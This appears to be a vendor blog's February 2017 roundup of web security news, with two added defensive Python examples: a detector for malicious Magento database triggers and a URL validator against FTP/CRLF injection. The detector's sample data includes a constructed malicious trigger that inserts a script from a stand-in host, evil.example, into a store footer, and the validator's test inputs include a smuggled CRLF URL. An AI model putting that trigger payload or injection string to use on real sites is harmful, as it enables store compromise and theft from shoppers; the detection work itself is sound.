Web Application Security News for February 2017

This month has brought us hacks from the world over – including a breach at Yahoo, which is possibly linked to a state-sponsored hacker, an XSS Bug in Steam, and reports of a Russian hacker who has sold access details to over 60 universities and Govt agencies, all harvested using SQLi. The WordPress vulnerability that was fixed last month has now been used to deface over a million sites and counting, and a Mirai successor may be on the rise.

Yahoo Warns Users Of Forged Cookies In Third Breach

Yahoo is sending messages to some users alerting them to the use of forged cookies to access their data in a third breach of customer accounts in 2015-2016, CNBC reports. Some of these hacks are attributed to a “state-sponsored actor” also involved with the 2014 Yahoo breach in which 500 million accounts were compromised.

Valve Patches Trivial XSS Bug in Steam

Valve Corp., has patched a cross-site scripting vulnerability on its popular Steam gaming platform that could be exploited by viewing a maliciously crafted profile.
The flaw could allow an attacker to carry out phishing attacks or execute malicious scripts just by opening a crafted profile page…

Russian-Speaking Hacker Sells SQLi for Unauthorized Access to Over 60 Universities and Government Agencies

  • Rasputin’s latest victims include over 60 (combined total) prominent universities and federal, state, and local U.S. government agencies.
  • Rasputin, a Russian-speaking and notorious financially-motivated cyber criminal, continues to locate and exploit vulnerable web applications via a proprietary SQL injection (SQLi) tool.
  • In November 2016, Rasputin penetrated the U.S. Election Assistance Commission (EAC) via SQLi.
  • 15 plus years of SQLi attacks, and going strong; this prolific vulnerability remains one of the most popular exploits for opportunistic actors due to its ongoing success rate.
  • Economic incentives are required to change the behavior that facilitates SQLi vulnerabilities either through penalties established by government regulations (sticks) or tax abatement incentives (carrots) for compliance.


Geographic locations of Rasputin’s latest U.S. education and government victims.
New Self-Healing Malware Targets Online Shops Running on Magento

… whenever a user places a new order, the malware starts execution. Then, the malicious database trigger executes before the Magento platform even puts together the PHP and assembles the page, reads a blog post signed by Willem de Groot, the researcher who analyzed the malware discovered by Jeroen Boersma.
The query, he says, checks for the existence of the malware in the header, footer, copyright, and every CMS block. If it doesn't find anything, it re-adds itself…
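An added example, not code from the post or from de Groot's write-up: a small audit routine over trigger definitions, in the shape of MySQL's information_schema.TRIGGERS rows, that flags the pattern described above, a trigger on an order table that writes to CMS or config content or carries script markers. The rows and the Magento 1 table names (sales_flat_order, cms_block, core_config_data) are constructed assumptions for the example.

```python
import re

# Constructed sample rows: (TRIGGER_NAME, EVENT_OBJECT_TABLE, EVENT_MANIPULATION,
# ACTION_STATEMENT). The first is a benign grid-sync trigger; the second mimics the
# self-healing behaviour: runs on order insert, checks for its own presence, re-adds itself.
SAMPLE_TRIGGERS = [
    ("sales_order_grid_sync", "sales_flat_order", "INSERT",
     "BEGIN UPDATE sales_flat_order_grid SET updated_at = NOW() "
     "WHERE entity_id = NEW.entity_id; END"),
    ("after_order_insert", "sales_flat_order", "INSERT",
     "BEGIN IF NOT EXISTS (SELECT 1 FROM cms_block WHERE content LIKE '%evil.example%') "
     "THEN UPDATE core_config_data SET value = CONCAT(value, "
     "'<script src=\"//evil.example/j.js\"></script>') "
     "WHERE path = 'design/footer/absolute_footer'; END IF; END"),
]

ORDER_TABLES = {"sales_flat_order", "sales_order"}            # assumed Magento table names
CONTENT_TABLES = ("cms_block", "cms_page", "core_config_data")  # where page content lives
# Statement writes into a content table (case-insensitive, spans the whole body).
WRITES_CONTENT = re.compile(r"\b(update|insert\s+into)\s+(%s)\b" % "|".join(CONTENT_TABLES), re.I)
# Markers that have no business inside a database trigger.
INJECT_MARKERS = re.compile(r"<script|<iframe|javascript:|unhex\(|from_base64\(", re.I)

def suspicious_triggers(rows):
    """Return [(trigger_name, [reasons])] for triggers worth a manual look."""
    findings = []
    for name, table, event, body in rows:
        reasons = []
        if table.lower() in ORDER_TABLES and WRITES_CONTENT.search(body):
            reasons.append("order-table trigger writes to CMS/config content")
        if INJECT_MARKERS.search(body):
            reasons.append("script or obfuscation marker in trigger body")
        if reasons:
            findings.append((name, reasons))
    return findings

if __name__ == "__main__":
    for name, reasons in suspicious_triggers(SAMPLE_TRIGGERS):
        print(name, "->", "; ".join(reasons))
```

On a live store the rows come from `SELECT TRIGGER_NAME, EVENT_OBJECT_TABLE, EVENT_MANIPULATION, ACTION_STATEMENT FROM information_schema.TRIGGERS`.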

Carders capitalize on Cloudflare problems, claim 150 million logins for sale

Filed under proof or it didn't happen… but we still don't know the full impact of Cloudflare's incident

Hacker Group Defaces Hundreds of Websites After Hacking UK Hosting Firm

…A hacking crew that goes by the name of National Hackers Agency (NHA) has defaced 605 websites in one go after they managed to get access to a server from UK hosting firm DomainMonster.
The attacks, brought to Bleeping Computer's attention by a member of another hacking crew, took place on Tuesday, February 21, and were all cached via Zone-H, a service that archives defaced websites…
…On Twitter, the company acknowledged the attacks but gave few details about what happened. No official statement was published on its site, or one that we could find. All the websites we checked from the defaced list are now up and running…

Florida Man Pleads Guilty To Clinton Foundation Hack Attempts

Timothy Sedlak of Florida has pleaded guilty to the charge of attempting to gain unauthorized access to the network of the charitable organization run by the Clintons, allegedly making 390,000 unsuccessful tries to hack its server, reports Reuters, quoting prosecutors. This comes in the wake of a 42-year jail term handed down separately to Sedlak by an Orlando court for producing and possessing child pornography.

Necurs Botnet Gets Proxy Module with DDOS Capabilities

The massive Necurs botnet, known for sending large spam campaigns, including the Locky ransomware that's been infecting countless computers, might soon be turned into a DDOS tool…
After a bit of work on this particular module, researchers realized there was a command that would cause the bot to start making HTTP or UDP requests to an arbitrary target in an endless loop – a DDOS attack…

Advisory: Java/Python FTP Injections Allow for Firewall Bypass (Attack scenarios include SSRF, XXE and more)

Recently, a vulnerability in Java's FTP URL handling code has been published which allows for protocol stream injection. It has been shown that this flaw could be used to leverage existing XXE or SSRF vulnerabilities to send unauthorized email from Java applications via the SMTP protocol. While technically interesting, the full impact of this protocol stream injection has not been fully accounted for in existing public analysis…
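An added example, not from the advisory: the injection works because CR/LF characters carried in a URL component end up inside the FTP command stream, so an application that fetches attacker-influenced URLs (the SSRF/XXE case above) should reject such URLs before any client library sees them. The check below, in Python, is an assumed mitigation pattern: an explicit scheme allowlist plus a control-character check on both the raw URL and its percent-decoded components.

```python
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}  # no ftp:, gopher:, etc. for server-side fetches
CONTROL_CHARS = {chr(c) for c in range(0x20)} | {"\x7f"}

def _has_control(s):
    return any(ch in CONTROL_CHARS for ch in s)

def check_outbound_url(url):
    """Return (ok, reason). Call this before handing a URL to any fetcher."""
    # Check the raw string first: recent Python versions silently strip CR, LF and
    # TAB inside urlsplit(), so parsing first would hide exactly the bytes we care about.
    if _has_control(url):
        return False, "control character in URL"
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"  # userinfo is another injection carrier
    if not parts.hostname:
        return False, "missing host"
    # Percent-encoded CR/LF (%0D%0A) is decoded by some clients before it hits the wire.
    for component in (parts.netloc, parts.path, parts.query, parts.fragment):
        if _has_control(unquote(component)):
            return False, "encoded control character in URL component"
    return True, "ok"

if __name__ == "__main__":
    for u in ("https://example.com/report.pdf",
              "ftp://user:pass@example.com/x",
              "https://example.com/a%0d%0aHELO%20x"):
        print(u, "->", check_outbound_url(u))
```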

Criminals Monetizing Attacks Against Unpatched WordPress Sites

… Criminals have inevitably begun to attempt to monetize attacks against WordPress sites still vulnerable to a severe REST API endpoint vulnerability silently patched in the recent 4.7.2 security update.
While more than one million websites have been defaced, researchers are now beginning to see some defacements leave behind links to rogue pharmaceutical websites trying to spam users into buying drugs or lure them into phishing scams for their payment card information…

If you would like information on how the Barracuda Web Application Firewall can help you protect your resources, visit our corporate site here.


Tushar Richabadas is a Product Manager for the Barracuda Web Application Firewall team in our India office. You can connect with him on LinkedIn here.
